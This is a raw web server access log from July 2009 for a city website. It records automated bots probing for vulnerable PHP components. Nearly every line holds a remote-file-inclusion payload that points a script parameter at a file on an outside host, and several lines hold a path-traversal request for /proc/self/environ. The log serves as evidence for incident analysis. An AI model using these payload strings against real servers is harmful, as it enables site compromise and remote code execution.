196.25.27.90 - - [01/Jul/2009:04:49:02 -0700] "GET /logs/access.log//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:04:49:02 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:04:49:02 -0700] "GET /include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:04:49:15 -0700] "GET /include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:04:49:15 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:04:49:15 -0700] "GET /logs/access.log//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:52:42 -0700] "GET /logs/access_080330.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:52:42 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:04:54:39 -0700] "GET /logs/access.log%20%20//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:55:02 -0700] "GET /logs/access.log%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:04:55:50 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:58:08 -0700] "GET /logs/access_080531.log%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
196.25.27.90 - - [01/Jul/2009:04:58:10 -0700] "GET /logs/access.log%20%20//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:02:32 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:02:32 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:02:32 -0700] "GET /include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:03:43 -0700] "GET /logs/access.log//rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:03:44 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:03:44 -0700] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:03:59 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:03:59 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:03:59 -0700] "GET /logs/access.log/bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:03:59 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:04:00 -0700] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:04:00 -0700] "GET /logs/bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:04:07 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:04:15 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:04:22 -0700] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.232.54.48 - - [01/Jul/2009:05:04:31 -0700] "GET /errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [01/Jul/2009:05:04:31 -0700] "GET /logs/access_081001.log/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [01/Jul/2009:05:04:31 -0700] "GET /logs/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [01/Jul/2009:05:04:47 -0700] "GET /logs/access.log/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:05:30 -0700] "GET /logs/access_080330.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:05:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:05:31 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:05:36 -0700] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:05:36 -0700] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:05:37 -0700] "GET /logs/access_080531.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:05:45 -0700] "GET /logs/access_081001.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:06:19 -0700] "GET /logs/access.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:08:17 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:10:15 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:10:15 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:10:15 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:05:10:33 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:05:10:33 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:05:10:39 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:05:10:39 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:11:04 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:14:55 -0700] "GET /errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:14:55 -0700] "GET /logs/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:14:55 -0700] "GET /logs/access.log/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:15:12 -0700] "GET /logs/access_081001.log/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:17:19 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:17:21 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:17:42 -0700] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:18:00 -0700] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:18:32 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:18:36 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:18:40 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:05:20:33 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:05:20:34 -0700] "GET /?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:05:20:37 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 200 4227 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:20:38 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:20:38 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:20:38 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:05:20:49 -0700] "GET /index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:05:20:49 -0700] "GET /logs/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:05:20:51 -0700] "GET /logs/access.log%20%20/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:23:59 -0700] "GET /logs/access_080531.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
194.109.22.117 - - [01/Jul/2009:05:24:05 -0700] "GET /logs/access_080531.log//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
194.109.22.117 - - [01/Jul/2009:05:24:05 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
194.109.22.117 - - [01/Jul/2009:05:24:05 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:05:26:18 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:05:26:18 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:05:26:18 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.157.45.177 - - [01/Jul/2009:05:27:12 -0700] "GET /logs/index1.php?=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.157.45.177 - - [01/Jul/2009:05:27:12 -0700] "GET /logs/access.log%20%20/index1.php?=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.157.45.177 - - [01/Jul/2009:05:27:13 -0700] "GET /index1.php?=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:28:05 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:28:12 -0700] "GET //vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:05:29:06 -0700] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:05:29:52 -0700] "GET //vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:01 -0700] "GET /logs/access_081001.log%20%20/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:14 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:14 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:14 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:15 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:15 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:16 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:26 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:26 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:26 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:26 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:27 -0700] "GET //vwar/backup/errors.php?error=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:27 -0700] "GET /logs///vwar/backup/errors.php?error=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:31 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:32 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:33 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:52 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:53 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:33:53 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:03 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:03 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:05 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:35 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:35 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:35 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:51 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:51 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:53 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:53 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:53 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:34:55 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:05:35:09 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
